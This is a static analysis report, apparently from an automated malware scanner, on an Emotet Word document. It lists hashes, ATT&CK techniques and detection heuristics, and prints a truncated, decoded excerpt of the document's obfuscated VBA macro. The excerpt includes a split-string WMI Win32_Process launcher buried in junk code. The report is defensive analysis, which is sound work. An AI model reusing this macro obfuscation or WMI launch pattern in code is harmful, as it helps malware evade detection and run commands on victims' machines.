Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 074efc192d48350c…

MALICIOUS

Office (OLE)

Size: 289.5 KB
Created: 2019-02-18 10:15:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 93c1cee7f0ec8faa7b5a7d9ff36cec69
SHA-1: 050d00b22a8bc868aa7792eb97de200a2e509907
SHA-256: 074efc192d48350c8a51391ac76d7677eee8c8bb964434b4e66632fca344d0a4
Risk score: 302

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter

The sample contains VBA macros with an AutoOpen function, a common characteristic of Emotet. The macros utilize GetObject and CreateObject to launch the 'Win32_Process' WMI class, specifically calling the 'Create' method with obfuscated strings like 'winmgmts'. This indicates the macro's intent is to execute arbitrary commands, likely to download and run a second-stage payload. ClamAV detection further confirms its malicious nature as Emotet.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-6861363-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6861363-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 52166 bytes
SHA-256: 5a24141b46165d9c20ef41e1fb8aab36567c7e10b63ed9e0e077d0dc0154dcd5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "J7836927"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "K3__0_9"
Function Q_26135()
   If R969070 <> u_47668_ Then
      R__56_0 = (96250033)
    L7_05__7 = k0822_9 * 725736348 + u7201985 + CLng(w61606_)
i9167_ = 624852533 / Hex(L95_9___ / Chr(j0477_ - CDate(653221215)) * 336135081 / 658372251) / j_29_4_ - Fix(27655918)
W4_265__ = (240425586)
End If
   If c255___0 <> H_88__51 Then
      R_4___ = (327343583)
    P6180275 = N_7_808 * 910472076 + j727_6__ + CLng(w9__382)
U5959_5_ = 962449622 / Hex(Q__63_ / Chr(i559_87 - CDate(620323208)) * 38548236 / 646412293) / c31362 - Fix(116467636)
i8_3322 = (904678120)
End If
   If b_97_05_ <> J35_2_ Then
      T9772886 = (316265073)
    j3773342 = j5___5_ * 994209387 + W9_2641 + CLng(w86__6)
k29__75_ = 287310971 / Hex(P4_74_7 / Chr(Q1_25_3 - CDate(993005636)) * 252373984 / 435830395) / t91_798 - Fix(165037700)
G_79_22 = (130517475)
End If
   If i50_004 <> n8944__ Then
      X50678 = (748350334)
    z36_5658 = h_776_ * 615638415 + D48_53_ + CLng(M_21304_)
J4_06715 = 5217535 / Hex(b__27_ / Chr(C_76659 - CDate(170564195)) * 619152673 / 714815817) / Z__963 - Fix(535392577)
M__300_ = (377572701)
End If
   If N70893 <> i__27_ Then
      K__242 = (640269831)
    r1__0_9_ = b4_69_9 * 910427916 + O01965 + CLng(r13_89)
K6__46 = 939911172 / Hex(C57539 / Chr(q93_275_ - CDate(484731141)) * 890546730 / 504562761) / l596_3__ - Fix(48870460)
l8518_06 = (947468235)
End If
   If z361__ <> c_7033 Then
      f_42477 = (250449282)
    j759_52 = w423070_ * 657364126 + J2_9527_ + CLng(o23750_)
H9_7_67_ = 593250741 / Hex(j__2498 / Chr(o_4733 - CDate(104412685)) * 945878929 / 700906862) / t__43392 - Fix(178591256)
t44_142 = (250945710)
End If
   If o5865_76 <> V1__7893 Then
      K34__73 = (536646801)
    K010_9 = q939_82 * 537753872 + Q_962_09 + CLng(Y_0__49)
E__416 = 602892561 / Hex(M__5344 / Chr(p94_689 - CDate(80608639)) * 960235727 / 942103588) / m_67417_ - Fix(603676045)
W255_20 = (422658149)
End If
   If i3_42_8_ <> E450050_ Then
      K1_75387 = (110066282)
    m_20811 = I5_333 * 949491260 + i5_58_9 + CLng(z_71_21)
K_350_6 = 576362040 / Hex(o4247_ / Chr(k7661581 - CDate(45897621)) * 801749007 / 106406446) / H___2560 - Fix(126592608)
u763_0_1 = (323247442)
End If
End Function
Function w_7_0_(b13_0_, d35585)
On Error Resume Next
   If r9__7_ <> j57__60 Then
      w170247 = (773259819)
    P9_4_2_ = j25_0_8 * 131139260 + j8_71_8 + CLng(m67__58)
C9___394 = 659598301 / Hex(m9285_16 / Chr(U5840332 - CDate(521173345)) * 560841025 / 154016721) / E69_8___ - Fix(229265740)
s34_9_42 = (748472625)
End If
   If C___641 <> K94929_ Then
      M8726_ = (657455705)
    c51565 = k876495 * 679640149 + R__7_7 + CLng(T2_6120)
E6_4_58 = 917661997 / Hex(s1_375 / Chr(o6269_ - CDate(755942178)) * 945076564 / 152109427) / c50423 - Fix(260212573)
V9587689 = (429316110)
End If
   If i7495_1 <> X686091 Then
      K__715 = (472557396)
    n80270 = z_006_5 * 8655305 + i__9_66 + CLng(j36_23_)
w6__850 = 115188368 / Hex(p4777__ / Chr(J_50_34 - CDate(181493695)) * 526241481 / 939493216) / i7_146_ - Fix(245892221)
j8__42__ = (999467095)
End If
Set H__700 = GetObject("winmgm" + "ts:Win" + "32_Proce" + "ssStartup")
   If f7_0__ <> L09434_6 Then
      f3_497 = (686367428)
    Q80207_3 = O8945_9 * 173027545 + k_1054 + CLng(U_5_43_)
i__521_ = 481052455 / Hex(w98_57 / Chr(Z71_73 - CDate(513319882)) * 749812153 / 996568670) / M68231 - Fix(278304838)
j_33_350 = (891259447)
End If
   If w9_54_ <> R600__4 Then
      z_592_ = (391768918)
    q056_14_ = U9_585__ * 312064397 + w489__2 + CLng(r7_7__6_)
V__7283 = 503912779 / Hex(J_243_ / Chr(l21272__ - CDate(711696454)) * 324955936 / 407607541) / z70__1_6 - Fix(85418817)
S402694 = (999396750)
End If
   If c6__20_ <> V6_532__ Then
      s3___6 = (758466284)
    Q54490_ = S_3
... (truncated)